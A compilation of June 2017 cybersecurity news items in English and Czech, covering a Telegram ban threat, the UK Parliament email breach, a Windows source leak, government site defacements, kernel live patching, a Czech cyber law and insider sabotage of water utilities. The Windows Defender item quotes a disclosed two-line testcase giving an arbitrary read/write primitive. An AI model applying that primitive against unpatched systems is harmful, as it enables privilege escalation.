Russia Threatens to Ban Telegram Messaging App, Says It Was Used By Terrorists
26.6.2017 thehackernews BigBrothers
Russia has threatened a ban against Telegram end-to-end encrypted messaging app, after Pavel Durov, its founder, refused to sign up to the country's new data protection laws.
Russia's FSB intelligence service said on Monday that the terrorists who killed 15 people in Saint Petersburg in April had used the Telegram encrypted messaging service to plot the attacks.
According to the new Russian Data Protection Laws, since January 1, all foreign tech companies have been required to store past six months' of the personal data of its citizens and encryption keys within the country; which the company has to share with the authorities on demand.
"There is one demand, and it is simple: to fill in a form with information on the company that controls Telegram," Alexander Zharov said, head of communications regulator Roskomnadzor (state communications watchdog).
"And to officially send it to Roskomnadzor to include this data in the registry of organizers of dissemination of information. In case of refusal… Telegram shall be blocked in Russia until we receive the needed information."
Russian wants Telegram to share its users' chats and crypto keys if asked, as the encrypted messaging app has become widely popular among terrorists for operating inside Russia.
Founder Pavel Durov said on Twitter that Intelligence agencies had pressured the company to weaken its encryption or install a backdoor.
So far, Telegram has refused to comply with the requirements in order to protect the privacy of its more than 6 million Russian users.
November last year, LinkedIn, the world's largest online professional network, was also banned in Russia for not complying with the country's data protection laws.


UK Parliament Hit by Cyberattack, Up to 90 MPs' E-mail Accounts Hacked
26.6.2017 thehackernews BigBrothers
A cyber attack has hit the email system of UK Houses of Parliament on Friday morning that breached at least 90 emails accounts protected by weak passwords belonging to MPs, lawmakers, and other parliamentary staff.
Meanwhile, as a precaution, the Security service has temporarily shut down the remote access (outside the Westminster) to its network to protect email accounts.
Liberal Democrat Chris Rennard has advised on Twitter that urgent messages should be sent by text message.
"We have discovered unauthorized attempts to access accounts of parliamentary networks users and are investigating this ongoing incident, working closely with the National Cyber Security Centre," the spokesperson said.
"Parliament has robust measures in place to protect all of our accounts and systems, and we are taking the necessary steps to protect and secure our network."
The authorities found less than 1% of parliament’s 9,000 email addresses had been compromised using the brute-force attack that lasted for more than 12 hours.
But if the emails were successfully accessed, experts believe and have warned that politicians could be at risk of blackmail or terror attacks.
It is unclear who is responsible for the attack, but the breach has happened just two days after the passwords of British cabinet ministers and officials were reportedly being sold online by hackers on Russian underground forums.
However, most UK officials suspect Russia and North Korea for the British Parliament cyber-attack.
"We are continuing to investigate this incident and take further measures to secure the computer network, liaising with the Britain’s National Cyber Security Centre (NCSC)." spokeswoman said.


Windows 10 Source Code Leaked Online

26.6.2017 securityweek  OS
A portion of Microsoft’s Windows 10 source code was leaked online this week on an enthusiast website that tracks Windows releases.

The source code, which Microsoft already confirmed to be from the Shared Source Initiative, was supposedly accessible only to OEMs (Original Equipment Manufacturers) and partners.

The code was listed on enthusiast site Beta Archive, but was listed on a free private FTP where numerous archived Windows builds are also present.

As per the rules of the site, only beta builds that have been already superseded by newer releases are accepted, “sourced from various forum members, Windows Insider members, and Microsoft Connect members.” Core source code isn’t accepted on the site.

The leaked source code was stored in a FTP folder called “Shared Source Kit,” and Beta Archive removed it immediately after learning that it might contain sensitive data. Specifically, it removed the folder after an article on The Register came into focus, claiming that several terabytes of internal builds and core source code leaked online.

A Beta Archive admin named Andy also provided some explanation on this action, revealing that they decided to remove the folder from the FTP server, along with listings on the site, to review its content “just in case we missed something in our initial release.” The folder will remain offline until a full review is carried out and its content is deemed acceptable under the site’s rules.

The administrator also explains that the folder was only 1.2GB in size, and that it contained “12 releases each being 100MB,” thus being far smaller than “32TB as stated in The Register’s article.” Being this small, the folder could not possibly cover core source code, the admin also noted.

Apparently, Microsoft already had a look at the contents of said folder and determined that it did contain “a portion of the source code from the Shared Source Initiative.” This means that the code, although not publicly accessible, was already available to Microsoft’s customers looking to license it through the program.

According to Windows Internals Expert Alex Ionescu, only the source code in the ARM Shared Source Kit was leaked in the incident.

<blockquote class="twitter-tweet" data-lang="en"><p lang="en" dir="ltr">No source code has been leaked other than the ARM shared source kit.</p>&mdash; Alex Ionescu (@aionescu) <a href="https://twitter.com/aionescu/status/878379371135946752">June 23, 2017</a></blockquote>

<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script>

The Register article also claimed that “top-secret builds of Windows 10 and Windows Server 2016, none of which have been released to the public,” along with “prerelease Windows 10 "Redstone" builds and unreleased 64-bit ARM flavors of Windows” were also leaked on Beta Archive.

The site indeed lists a great deal of beta Windows builds, some of which weren’t accessible to the public at the time of their release, but accepts only defunct builds, which have been already superseded by newer ones. However, these builds were added to the site over time, and aren’t part of a single large leak.

However, a large number of builds were added on March 24, 2017, when some of the site’s users provided “a lot of Windows releases,” and the incident might be related to the recent arrest of two Britons for “unauthorised intrusion into networks belonging to Microsoft.”

The two supposedly hacked into Microsoft’s network between January and March this year, but no confirmation of a connection with Beta Archive has emerged. Referring to the arrests, the site’s admin said: “we don’t believe there is any connection with this alleged “Windows 10 core source code leak”.”


Govt Websites in Ohio, Maryland Hacked With Pro-IS Messages

26.6.2017 securityweek  CyberWar
Several government websites in the US states of Ohio and Maryland had to be shut down Sunday after being hacked to display messages supporting the Islamic State group.

Among the affected websites was one belonging to Ohio Governor John Kasich.

Posted on the websites was a message from a group calling itself Team System DZ, vowing revenge against US President Donald Trump.

"You will be held accountable Trump, you and all your people for every drop of blood flowing in Muslim countries," it read, adding: "I Love Islamic state."

The messages were written in gold lettering against a black backdrop.

The hacked websites also displayed the Muslim profession of faith written in white lettering in Arabic, proclaiming that "there is no god but Allah and Muhammad is the prophet of Allah."

The message posted on Kasich's website also played an Islamic call to prayer.

A website for Howard County, Maryland, several miles outside Washington DC, was also affected.

Some of the websites remained out of service early Monday, while Kasich's www.governor.ohio.gov site was back up and running after being taken offline Sunday.


Corvil Integrates its Security Analytics Into Cisco's Tetration Platform

26.6.2017 securityweek  Security
At Cisco Live, Las Vegas Monday, IT analytics firm Corvil announced the integration of its Security Analytics with the Cisco Tetration Analytics platform. The intention is to combine Corvil's realtime packet-level analysis with Tetration's vast big data repository of downstream application-level data flows to provide an early, rich, granular and consistent detection of anomalous communications indicative of compromise.

Tetration was launched by Cisco in June 2016. It was described as "a platform designed to help customers gain complete visibility across everything in the data center in real time -- every packet, every flow, every speed." The aim is to provide CIOs and CISOs complete visibility into today's complex, dynamic and heterogenous data center.

In February 2017, Cisco announced Tetration 2, now automating policy enforcement and providing APIs. "Cisco is continuing its tradition of open ecosystems by working with partner companies to build applications and integrations with their solutions," it announced. It can be used, said the announcement, to "define use cases specific to their environment, and deploy validated application segmentation policies."

It is into this that Corvil has integrated its Security Analytics product.

"Cisco records the communications flows, and puts those flows into this big repository called Tetration," David Murray, chief business development officer at Corvil, told SecurityWeek. "It then uses those flows to be able to map application interdependencies and say here is how applications are communicating -- but it's a lot of data they're aggregating, billions of flows that are communicating on an ongoing basis, across an enterprise."

This is an essential step in the evolution of network surveillance, suggests Murray. "If you think about historical systems surveillance -- especially where regulation and governance requires that surveillance -- the original perimeter and signature surveillance is no longer adequate. Surveillance has now evolved into monitoring what is communicating with what and when -- but even then it is hard to provide sufficient granularity. It is increasingly not just who is communicating with what and when, but also what is actually being communicated."

This is where Corvil's Security Analytics with its realtime packet-level analyses adds value to Tetration. "For example," said Murray, "flow data by its nature is going to see a certain amount of communication between two points. It may even understand that a particular protocol is being used; for example, it might recognize DNS traffic. But by opening up the packet we are able to see what is happening within that flow; that, for example, there is something tunneling within that DNS traffic. Or we're able to see specific filenames, or error types that are being reported back and forth within that communication. Furthermore, we're able to see things like which user is logged on by analyzing packet data for LDAP and Kerberos."

This is where the integration with Tetration 2 becomes particularly valuable. "By taking this information," he continued, "and enriching the flow data (such as administrator level tunneling data with a particular type of fileset) we provide the ability to initiate an automatic response through Tetration that says 'immediately quarantine that host'."

The value of Corvil to Tetration customers is that security policy enforcement can be invoked on an analysis of the flow content rather than just the flows themselves. The value of Tetration to Corvil is that it provides a massive big data repository of downstream data that can be analyzed to provide more accurate responses and reduce false positives.

"Improvements in security operations, network optimization, and business process optimization hinge on applying advanced analytics techniques to network data,” said Shamus McGillicuddy, senior analyst for Enterprise Management Associates. "The depth and insight from Corvil Analytics combined with Cisco's Tetration Analytics will provide richer understanding of workload characteristics, improved detection of evasive security threats, and more effective transaction insight. This type of integration is needed to drive tighter alignment between network, application, security, and business teams."

"It takes an ecosystem to address today's complex challenges of data center visibility, service assurance, and security," said Murray. "The combination of Cisco Tetration's data and our packet-level data helps provide very granular and enforceable security policies."

Further information on the integration of Corvil Security Analytics with Cisco Tetration Analytics will be available at Cisco Live this week.


Google Hacker found a new way to bypass Microsoft Windows Defender
26.6.2017 securityaffairs
Vulnerebility

The Google Project Zero expert Tavis Ormandy has found a flaw in Windows Defender that allow attackers to bypass the Microsoft anti-virus tool.
The popular Google Project Zero hacker Tavis Ormandy has discovered a new bug in Windows Defender that allow attackers to circumvent the Microsoft anti-virus tool.

Ormandy publicly disclosed the news of the vulnerability in Windows Defender on Friday after Microsoft released a for its software. Ormandy reported the vulnerability to Microsoft on June 9th.

The vulnerability resides is in the non-sandboxed x86 emulator Windows Defender uses.

The expert explained that “apicall” instruction can invoke internal emulator APIs running them with system privilege, unfortunately, it is exposed to remote attacks by default.

The hacker discovered a heap corruption issue in the KERNEL32.DLL!VFS_Write API.

“I discussed Microsoft’s “apicall” instruction that can invoke a large number of internal emulator apis and is exposed to remote attackers by default in all recent versions of Windows. I asked Microsoft if this was intentionally exposed, and they replied “The apicall instruction is exposed for multiple reasons”, so this is intentional.” wrote Ormandy.

“This full system x86 emulator runs as SYSTEM, is unsandboxed, is enabled by default and remotely accessible to attackers. I took a quick stab at writing a fuzzer and immediately found heap corruption in the KERNEL32.DLL!VFS_Write API, I suspect this has never been fuzzed before.”

Follow
Tavis Ormandy ✔ @taviso
I wrote a fuzzer for the unsandboxed x86 emulator in Windows Defender and found arbitrary read/write. https://bugs.chromium.org/p/project-zero/issues/detail?id=1282 …
8:11 PM - 23 Jun 2017
449 449 Retweets 736 736 likes
Twitter Ads info and privacy
windows defender

After the disclosure of the bug, Ormandy published a minimal testcase to exploit the bug:

MpApiCall(“NTDLL.DLL”, “VFS_Write”, 1, Buf, 0, 0xffffffff, 0);
MpApiCall(“NTDLL.DLL”, “VFS_Write”, 1, Buf, 0x7ff, 0x41414141, 0);

“The first call extends the length of the file to nOffset, but because the numberOfBytes parameter is 0 no space is allocated. Then you can read and write arbitrary data to an arbitrary offset to the MutableByteStream object buffer. This is a very powerful exploit primitive, and exploitation does not seem difficult.” he added.

Microsoft released a fixed version of the Malware Protection Engine, version 1.1.13903.0.


Záplatování jádra za běhu: kGraft to zvládne bez výpadku
26.6.2017 Root.cz
Zranitelnosti
Linuxový server se musí kvůli software restartovat v jediném případě: když je potřeba vyměnit jádro. S technologií kGraft už ale nutně neplatí ani to. Dokáže za plného provozu vyměnit jednu funkci za druhou.
Živé záplatování jádra umožňuje zjednodušit správu velkých serverů a opravit nejvážnější problémy za běhu, říká Jiří Kosina z pražské pobočky společnosti SUSE. Máme tu velkou skupinu jaderných vývojářů, kteří se zabývají ovladači, plánovačem a podobně, řekl na začátku při představování Jiří Kosina. Nejnovější věc, na které tu teď pracujeme, je patchování linuxového jádra za běhu. Často se prý lidé vývojářů ptají, k čemu je něco takového vůbec potřeba, když reboot nic nestojí. Děláme to hlavně proto, protože to po nás chtěli zákazníci. Reboot celého datacentra taky není zadarmo, stojí to obrovské náklady.

Velká datacentra mají přesně naplánované údržbové cykly, většinou v řádech měsíců. Každý neočekávaný restart systémů přináší další náklady. Když přijde bezpečnostní problém nebo se objeví problém se stabilitou, který by jim to mohl shodit, je pro ně hodně drahé operativně naplánovat restart celého datacentra. Firmy proto chtějí mít možnost zabezpečit jádro okamžitě a pak mají čas v bezpečném stavu počkat do dalšího okna pro plánovanou údržbu.
Tohle je ovšem jen nepřímý důsledek toho, že nabootovat enterprise server může trvat třeba tři čtvrtě hodiny. Když máte šestnáct terabajtů RAM, bude jen její inicializace biosem trvat klidně čtyřicet minut. I z tohoto důvodu se to nedá udělat rychleji, vždycky vás to bude stát čas, během kterého server nepracuje, vysvětlil Kosina.

kGraft nepotřebuje přestávku
Vývojáři SUSE vytvořili pro záplatování za běhu vlastní technologii kGraft, kterou už komerčně nabízejí a zákazníci ji mají reálně nasazenou. Trochu jsme tu porušili naši běžnou filosofii, kdy obvykle nejprve všechno posíláme do upstreamu Linusovi. kGraft je ale hodně nová věc, která je poměrně rozsáhlá. Nejprve jsme chtěli mít nějaká reálná nasazení a uživatele a teď to celé po kouskách posíláme do jádra. V podstatě jsme s tím hotovi. Ve zdrojových souborech jádra je už volba CONFIG_LIVEPATCH, která zapíná patřičné API pro aktualizaci funkcí jádra za běhu.
Příklad serveru, který nechcete restartovat
Patch pro živé záplatování jádra má zvláštní formát a SUSE v této formě neposkytuje zdaleka všechny záplaty. Není to možné, protože to není v našich silách, je to hromada ruční práce. Proto se záplaty omezují na bezpečnostní problémy, chyby způsobující nestabilitu nebo potenciálně poškozující data. Pokud tedy víme, že v jádře je chyba umožňující získat roota nebo je někdo schopen úmyslně poškodit data, vytvoříme live patch. V této formě se tak například nedistribuují nové ovladače pro hardware.

Vývojáře prý na začátku překvapilo, že jádro nebylo nutné nijak zvlášť upravovat. Vytvořili jsme celou novou infrastrukturu, ale do stávajících kódů jsme zasahovali poměrně málo. Později se objevily okrajové případy, kdy bylo potřeba upravovat zdrojové kódy více. Například záplatování plánovače je velmi zajímavé, nebo jsme doplnili možnost opravy samotného kGraft. Taky je to hodně komplikované, ale jde to.

Výhodou kGraft je fakt, že se jádro během záplatování vůbec nezastaví. Možná jste slyšeli o Ksplice, který ale funguje jinak. Pošle všem procesorům přerušení, všechny se sejdou v nekonečné smyčce, pak se vymění jádro a zase se spustí. Nedojde sice k restartování systému, ale je tam potenciál pro výpadek v řádu stovek milisekund, kdy jádro nemůže vůbec nic dělat. My jsme zvolili jiný přístup, kdy se činnost jádra vůbec nezastaví a kód se postupně přesune do nového stavu.

Existuje také ještě varianta zvaná Kexec, která ale dělá ve skutečnosti něco jiného – nechá nabootovat nové jádro místo starého. Ušetříte tím sice čas inicializace hardware, ale popadají vám všechny procesy, soubory i TCP spojení. Měníte prostě celé jádro se vším všudy.

Příprava je nutná
Jak tedy provést živou úpravu kódu tak, aby se nic nerozbilo? Používáme tam několik zajímavých triků. Celé jádro je zkompilované pomocí GCC s parametrem -pg, který vytvoří profilovací kód. Na začátek každé funkce překladač přidá skok do profilovací funkce, od které se očekává, že bude měřit, kolikrát se daná funkce použila, jak dlouho trval její běh a podobně. V jádře se ale tato vlastnost nepoužívá, takže vývojáři využijí přidané volání a „ukradnou si ho“ pro sebe. Na tohle místo jsme schopni v případě potřeby přidat přesměrování na opravenou verzi funkce, popisuje základní princip Kosina.
Při startu jádra se pak všechna přidaná volání upraví tak, že obsahují jen instrukci NOP . Ta nic nedělá (NOP = no operation) a jádro běží normálním způsobem. Všechny jaderné funkce mají na začátku pět bajtů, které se ale při provádění přeskočí a nijak běh neovlivňují. Takto připravené místo je pak možné kdykoliv později použít pro vložení instrukceJUMP následované adresou nové funkce. Tímhle trikem přesměrujeme jádro na jinou funkci a zbytek té původní už se pak nikdy neprovede.

V současné době je záplatování za běhu podporováno na platformě x86, pracuje se také na S/390, PowerPC a ARM64. Přidávat další architektury není problém, většina kódu je společná, musíme jen naučit GCC přidávat správně prology funkcí a to je vlastně všechno.

Upravujeme jádro za plného provozu
Jak pak probíhá samotné přesměrování? Zásadní je, že změna musí být atomická a nikdy nesmí dojít k tomu, že by byla funkce rozbitá. V každou chvíli totiž může být jádrem zavolána a musí proběhnout bez zastavení a podle očekávání. Prolog funkce musí mít pět bajtů (instrukce JUMP plus adresa), ale platforma x86 dovoluje atomicky vyměnit pouze čtyři bajty. My se ale nesmíme dostat do situace, kdy máme už čtyři bajty vyměněné a pátý ještě ne a jádro nám do takto rozpracované funkce skočí.

Proto se použije další zajímavý trik, který umožňuje chytře atomicky vyměnit všechny bajty „najednou“. Když chceme začít záplatovat, naplníme si připravené místo pěti jednobajtovými instrukcemi INT 3, což je softwarový breakpoint. Pokud by v kteroukoliv chvíli procesor chtěl funkci vykonávat, narazí na začátku na instrukce NOP nebo INT 3. Breakpoint v tomto případě zpracovává samo jádro, které ví o probíhajícím záplatování a proto rovnou skočí zpět za pětibajtový prolog. Chováme se k tomu tedy tak, jako by tam žádný breakpoint nebyl, a funkce normálně proběhne.

Postupná výměna adresy v prologu
Pět breakpointů je postupně odzadu vyměněno za adresu nové funkce. V jakoukoliv chvíli je před adresou stále alespoň jeden breakpoint, takže přepis může trvat libovolně dlouho a funkce je stále vykonavatelná v původní podobě. Teprve až v posledním kroku nahradíme první breakpoint instrukcí JUMP a tím dokončíme přesměrování ze staré podoby funkce na novou. Při tomto postupu mají vývojáři vždy jistotu, že procesor nenarazí na nekonzistentní data, na kterých by havaroval.

Upravená funkce tak nakonec začíná skokem do kódu kGraft, který se musí rozhodnout, kam bude skok pokračovat. O zmíněných pět bajtů se dělíme ještě s funkcí ftrace, která dovoluje jádru zapínat různé mechanismy pro sledování chování jednotlivých funkcí. Proto musí být mezi novou a starou podobu funkce vložena logika, která rozhoduje, co bude po skoku následovat. Pokud je to náš skok kvůli upravené funkci, následuje další skok na novou podobu, která opět začíná pěti nepoužívanými bajty. To pro případ, kdy by bylo nutné někdy později funkci znovu opravit. Je možné buď znovu zasáhnout do volání původní funkce nebo jednotlivé skoky řetězit.

Průběh funkce před a po opravě
Jeden modul vládne všem
Jádro je možné záplatovat po jednotlivých funkcích, ale z praktických důvodů se zákazníkům distribuuje vždy jedna velká kumulativní záplata ve formě běžného modulu .ko. Ten poslední vždycky obsahuje všechno, takže s poslední verzí vždycky měníme všechny už záplatované funkce. Vůbec to nevadí, protože doba záplatování podle Kosiny nezávisí na tom, kolik funkcí se upravuje. Jedna velká úprava je pro nás výhodnější, protože vždycky víme, v jakém stavu se systém nachází. V opačném případě by si uživatel náhodně aplikoval různé změny a množiny záplat a my bychom nebyli schopni takový systém podporovat.

Tvorba záplaty je z velké části ruční prací, což má podle Jiřího Kosiny výhodu zejména v tom, že vývojář může skutečně celý kód projít a zkontrolovat. Většinou je to celá skupina funkcí, protože se většinou ukáže, že kvůli jedné chybě je toho potřeba vyměnit víc. Problém je, že tyto funkce jsou na sobě závislé a je potřeba opět udržet konzistenci. Může se stát, že nová verze funkce má jiný počet parametrů, což se musí zohlednit i v ostatních funkcích. Musí se tedy vždy zajistit, že se mezi sebou nemíchají různé generace funkcí. Stará volá starou nebo už nová novou, nikdy ne křížem.

Jádro tedy navíc hlídá, v jakém stavu je rozpracované záplatování a pouští jednotlivé procesy vstupující do jádra buď starou cestou nebo už novou. Říkáme tomu, že hlídáme, v jakém vesmíru ten daný proces je. Jestli je ve starém nebo už v novém. Podle tohohle kontextu ho pak na rozhraní uživatelského a jaderného prostoru pouštíme do správných funkcí. Postupně se tedy jednotlivé procesy označují podle toho, zda už jejich funkce byly záplatovány nebo ne. Až jsou všechny procesy označené, můžeme prohlásit, že záplatování jádra skončilo a vše už běží na novém kódu. Jádro tak vlastně postupně „dopluje“ do migrovaného stavu.

Rozhodování na vstupu do jádra
Tento proces zatím ovšem neumí upravovat datové struktury v jádře. Umíme jen vyměnit kód, ale nedokážeme to ve chvíli, kdy se zároveň mění data. Museli bychom vyhledat všechny instance těchto dat v paměti, což není možné, a zároveň všechen kód, který s nimi pracuje. Naštěstí se to u bezpečnostních záplat nestává příliš často. Za rok a půl jsme dělali několik stovek záplat a stalo se nám jednou, že jsme museli zasahovat do dat. Podle Kosiny má ale i tohle několik způsobů řešení a vývojáři nich pracují. Není to velký problém, ale chtěli bychom ho do budoucna vyřešit.

Oprava za jízdy
Výhodou technologie kGraft je, že skutečně ani na okamžik nezastavuje činnost opravovaného serveru. Nevýhodou je, že záplaty je nutné vytvářet ručně. Podle Kosiny to ale v praxi není problém, protože to v SUSE zvládá jediný vývojář. Nejsložitější je obvykle pochopit, co daná úprava dělá, což nemusí být triviální. Ale daří se nám vydávat opravy ve stejnou chvíli, kdy je distribuujeme ve standardní podobě. Uživatelé si tak mohou vybrat. Vývojáři zároveň podporují až dvacet různých verzí jádra v různých produktech. Uživatelé nechtějí restartovat servery, takže jim nemůžeme říct, že podporujeme jen nejnovější jádro a oni mají restartovat a vyměnit si ho.

S během záplatovaných funkcí je samozřejmě spojena také nějaká režie. Je to několik instrukcí na funkci navíc, což může být hodně, ale také nemusí. Pokud se funkce volá velmi sporadicky, nemá její záplata na výkon systému žádný vliv. Pokud se ale naopak používá velmi často, začne se zdržení projevovat. Dokud ale není funkce nijak záplatovaná, její úprava se nijak neprojevuje. Jen zabírá v paměti o pět bajtů více, takže jádro je mírně nabobtnalé.

Celkem prý vývojáři v SUSE za rok a půl vydali téměř tisíc takových záplat. Jejich množství ale rozhodně není stabilní, někdy se neděje nic a pak někdo objeví chybu a ostatní se na ni vrhnou a objeví hromadu dalších.


Hackeři na amerických vládních webech vyhrožovali Trumpovi

26.6.2017 Novinky/Bezpečnost BigBrother
Internetové stránky vládních úřadů amerického státu Ohio napadla v neděli skupina hackerů, která podporuje teroristickou organizaci Islámský stát (IS). Počítačoví piráti na napadených webech, včetně stánek guvernéra státu Ohio Johna Kasicha, vyvěsili výhrůžný vzkaz adresovaný americkému prezidentovi Donaldu Trumpovi a americkému lidu. Informoval o tom v pondělí server BBC.
"Vy, Trumpe, a všichni vaši lidé ponesete zodpovědnost za každou kapku krve, která proteče muslimskými zeměmi," psalo se ve vzkazu s arabským logem skupiny Team System DZ. Vzkaz byl zakončen slovy: "Miluji Islámský stát."

Tato skupina hackerů podle serveru BBC už v minulosti proslula podobnými akcemi, ale s nenávistnými vzkazy vůči Izraeli.

Hnutí Islámský stát (IS) dobylo v roce 2014 značná území v Iráku a Sýrii, v posledních měsících ale v obou zemích zaznamenalo výrazné ztráty. Spojené státy stojí v čele mezinárodní koalice, která v Iráku a Sýrii pomáhá místním silám bojovat proti IS.


Novelu zákona o kybernetické bezpečnosti podepsal prezident

26.6.2017 SecurityWorld Kyber
Minulý týden prezident Miloš Zeman podepsal novelu zákona o kybernetické bezpečnosti. Nově tak vznikne úřad, který bude předcházet hackerským útokům a navrhovat opatření při řešení probíhajících incidentů. Zákon bude také vztažený na provozovatele informačních systémů v energetice nebo v dopravě, kteří budou muset hlásit bezpečnostní incidenty.
Novela zákona o kybernetické bezpečnosti přináší výrazné rozšíření tzv. povinných subjektů, které budou mít zákonnou povinnost řešit kybernetickou bezpečnost a přijmout odpovídající kroky, aby zabránily bezpečnostním rizikům.

Tuto povinnost vnáší nově do celé řady důležitých sektorů, jako např. zdravotnictví, a dalších, které poskytují kritické „základní služby“ typu utility apod.

Jednou z nejdůležitějších povinností je u všech těchto společností monitorovat dění ve vlastní síti a informačních systémech, umět vyhodnotit bezpečnostní útoky a včas je oznámit bezpečnostnímu úřadu.

Tato povinnost se vnímá jako klíčovou, neboť dnes většina společností bohužel neplní ani základní požadavky tzv. kybernetické hygieny, které spočívají mimo jiné právě ve schopnosti odhalovat útoky, odkrývat, analyzovat a řídit rizika, a sdílet informace o útocích napříč jednotlivými podniky, což jiným institucím pomůže se na případnou hrozbu lépe a včas připravit.

Nově vznikne také úřad, který bude hackerským útokům předcházet a navrhovat opatření při řešení bezpečnostních incidentů. Specializovaný orgán tak převezme část role Národního bezpečnostního úřadu. Za nesplnění nových povinností hrozí pokuta až pět milionů korun.

Riziko počítačových útoků celosvětově stoupá, v Česku to může být ročně až 1, 7 milionu kybernetických útoků s možnými ztrátami až 5, 4 miliardy korun, jak vyplývá z údajů České asociace pojišťoven.

Veřejné zprávy informující o úspěšnosti kybernetických útoků jsou ale v českém prostředí ještě stále méně časté než v zahraničí, což je částečně zapříčiněno dvěma faktory:

Schopnost detekce (neboli schopnost si vůbec všimnout probíhajícího útoku) je v ČR v průměru poměrně slabá. Společnosti by tak měly v rámci prevence rizik využívat moderních detekčních nástrojů, jež jsou k odhalení moderních hrozeb nezbytné, a zajistit si kvalitní odborníky a bezpečnostní analytiky.
V případě, že ve firmě dojde k odhalení útoku, je nyní vcelku častou praxí „zatloukat“ a nedat nic najevo. Podle zákona o kybernetické bezpečnosti nyní mají dotčené společnosti povinnost incident nahlásit úřadu. Velmi podobně k této oblasti přistupuje i nařízení GDPR, které také obsahuje povinnost každý takový incident zaznamenat, a ty významnější pak nahlásit do 72 hodin.

Koho se novela primárně dotkne?

Nově se novela ZKB bude týkat velké skupiny společností, které jsou provozovatelem tzv. základních služeb, např. banky, nemocnice, dopravní podniky atd., nebo poskytovatelem tzv. služeb digitálních – platformy pro elektronické obchodování a vyhledávače (v dosavadní verzi platného zákona zůstaly tyto společnosti mimo jeho platnost).

Základní služba je přitom slovy zákona „služba, jejíž poskytování je závislé na sítích nebo informačních systémech a jejížnarušení by mohlo mít významný dopad na zabezpečení klíčových společenských nebo ekonomickýchčinností v některém z těchto odvětví: energetika, doprava, bankovnictví, infrastruktura finančních trhů, zdravotnictví, dodávky a rozvody pitné vody, digitální infrastruktura, chemický průmysl a veřejná správa.“

Digitální službou se pak rozumí „služba informační společnosti, která spočívá v poskytování služby online tržiště, které spotřebitelům umožňuje online uzavírat s prodávajícím kupní smlouvu nebo smlouvu o poskytnutí služeb, internetového vyhledávače nebo cloud computingu, který umožňuje přístup k rozšiřitelnému a přizpůsobitelnému úložišti výpočetních zdrojů, jež je možno sdílet“.

Novelu zákona o kybernetické bezpečnosti uvítá snad každý, kdo má zdravý selský rozum, a ví, že dnes je opravdu životně důležité zajistit bezpečnost informačních systémů, zejména v uvedených kritických oborech jako jsou energetika, vodárenství, zdravotnictví atd. Právě zdravotnictví totiž dosud trpělo poměrně značnou neschopností zajistit si pro tyto účely potřebné zdroje, ať již finanční nebo lidské. Zákon by jim v tom měl nyní pomoci.

Pro většinu podniků však bude včasné splnění požadavků ZKB vzhledem k vysokému stupni zanedbanosti a finančnímu podhodnocení v minulých letech velmi obtížné.

Jak do budoucna sladit pravidla novely ZKB s další legislativou v této oblasti, např. GDPR?

Vztah novely ZKB, jejíž účinnost lze očekávat ke konci léta, případně začátkem podzimu, s evropským nařízením GDPR, které bude platné od 25. 5. 2018, je dvojsečný. Na jedné straně se shodují především ve dvou oblastech, a to v: 1) nutnosti umět včas detekovat a správně vyhodnotit nejrůznější typy kybernetických útoků, hrozeb a rizik, a umět na tato rizika rychle a účinně reagovat (povinnost incidenty včas hlásit), 2) potřebě věnovat kybernetické a informační bezpečnosti větší pozornost a prostředky.

Velké rozdíly se pak vnímají mezi smyslem a obsahem obou legislativ, za upozornění přitom stojí zvláště cíl ochrany a přístup k výběru bezpečnostních opatření.

ZKB si klade za cíl především ochránit funkčnost a dostupnost základních služeb, například aby byla k dispozici pitná voda, fungovala elektřina, jezdily dopravní prostředky, fungovaly státní orgány, banky apod.

Cílem GDPR je pak zejména ochrana soukromí a práv fyzických osob z pohledu ochrany zpracování jejich osobních údajů – aby nikdo neukradl, nezveřejnil, nezměnil či nevymazal jejich osobní data.

V přístupu k výběru bezpečnostních opatření je pak novela zákona o kybernetické bezpečnosti jasnější, neboť přesně stanovuje konkrétní seznam bezpečnostních opatření, která musí každá společnost, na niž se ZKB vztahuje, přijmout.

Jde například o ochranu přístupu do sítě, zajištění bezpečného přihlašování jejích uživatelů, využití šifrovacích technologií, pravidelný monitoring apod. U evropského nařízení GDPR je přístup založený na individuálním hodnocení rizik.

To znamená, že je na každém správci dat, aby si sám vyhodnotil, kolik osobních údajů zpracovává, jaké mají tyto údaje hodnotu nejen pro něj, ale i pro případné útočníky, jak rozsáhlé jsou systémy, v nichž údaje zpracovává, kolik uživatelů má do těchto systémů přístup a jak jsou jednotlivé systémy zranitelné.

Dle úvodní analýzy si tak každý vyhodnotí konkrétní rizika a přijme adekvátní bezpečnostní opatření (např. šifrování dat, jejich anonymizaci, monitoring atd.).


Company fired an employee, he shut down water utility providers’ networks in 5 cities
26.6.2017 securityaffairs Cyber

A former employee was sentenced to one year and one day in prison for damaging the IT networks of several water utility providers across the US East Coast.
Adam Flanagan (42) of Bala Cynwyd, PA was sentenced to one year and one day in prison by a Pennsylvania court for damaging the IT networks of several water utility providers across the US East Coast.

The news was reported by Bleeping Computer, the man worked between November 2007 and November 2013 as engineer for an unnamed company that manufactured smart water, electric, and gas readers.

Among the Flanagan’s tasks, there was the set up of Tower Gateway Basestations (TGB) for the customers, which were mainly water utility networks.
The Tower Gateway Basestations are essential components for water facility networks composed of smart meters installed at people’s homes that exchange data with water facility operators’ systems.
These networks allow water facility operators to collect consumption data and check the status of the installs at the customers’ homes.

On November 16, 2013, the company fired Flanagan for undisclosed reasons, then the man decided to punish the company by shutting down the TGB stations paralyzing the water facility networks of the company customers. Flanagan also changed passwords on some TGBs, using offensive words.

The utility providers had to send out employees at customer homes to collect monthly readings about their consumption.

“According to court documents, the FBI tracked down Flanagan’s actions to six incidents in five cities across the US East Coast: Aliquippa (Pennsylvania), Egg Harbor (New Jersey), Kennebec (Maine), New Kensington (Pennsylvania), and Spotswood (New Jersey).”reported Catalin Cimpanu from Bleepingcomputer.

water utility TGB stations Flanagan-attacks

The investigators were able to identify the former employee as the responsible of the incidents, then the US authorities filed charges on November 22, 2016. Flanagan faced a maximum sentence of 90 years in prison, plus a $3 million fine. He pleaded guilty on March 7, 2017, before receiving his sentence on June 14, 2017.

Flanagan faced a maximum sentence of 90 years in prison, plus a $3 million fine. He pleaded guilty on March 7, 2017 and on June 14, 2017 he was sentenced to one year in the jail, let me say that judges were clement.


Reading the 2016 Internet Crime Complaint Center (IC3) report
26.6.2017 securityaffairs Crime

According to 2106 Internet Crime Complaint Center (IC3) report, 298,728 complaints were received in 2016 totaling more than $1.3 billion in financial loss.
According to the new edition of the Internet Crime Complaint Center (IC3) report, 298,728 complaints were received in 2016 totaling more than $1.3 billion in financial loss.

